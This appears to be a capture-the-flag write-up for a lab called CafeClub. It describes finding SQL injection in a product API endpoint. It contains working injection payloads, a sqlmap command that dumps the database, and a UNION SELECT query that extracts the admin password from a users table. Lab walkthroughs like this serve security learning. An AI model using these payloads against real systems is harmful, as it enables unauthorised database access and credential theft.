CafeClub

Our challenge's hint is SQLi. So let's see where a dev has forgotten to use prepared statements. 😃

My approach today was to hit as many endpoints I could, and check afterwards if they could be considered an endpoint that talks with a database. Once I think I clicked all the buttons, I return to BurpSuite and highlight all the interesting requests. However, every single endpoint I'd hit, would not respond on the basic payload '+and+1=1-- +- Maybe I needed to try some different payloads? I tried changing the + for %20 , but that did not work either. Eventually I ended up retesting an endpoint, kinda forgot to URL encode it and I forgot to add ' in the beginning of my payload. But...

I got a response back! I quickly tested it with a false statement.

I think I found the entry point!

Always try different variations of your payload. URL encoded + %20, not URL encoded, with ' , " or just nothing.

I used SQLMap to confirm the SQLi with this command.

sqlmap -u "https://<lab.id>/api/products/16" 
--headers="Authorization: Bearer <TOKEN>" 
--method GET --level=3 --risk=2 --dump

After the SQLMap ran, I found the user table of the application.

Another quick way is the payload GET /api/products/16 union select null,password,null,null,null,null,null,null from users where username='admin'-- -

There I found that the admin's password was my flag 🇧🇪

PreviousOttergram NextCheesy Does It

Last updated 2 months ago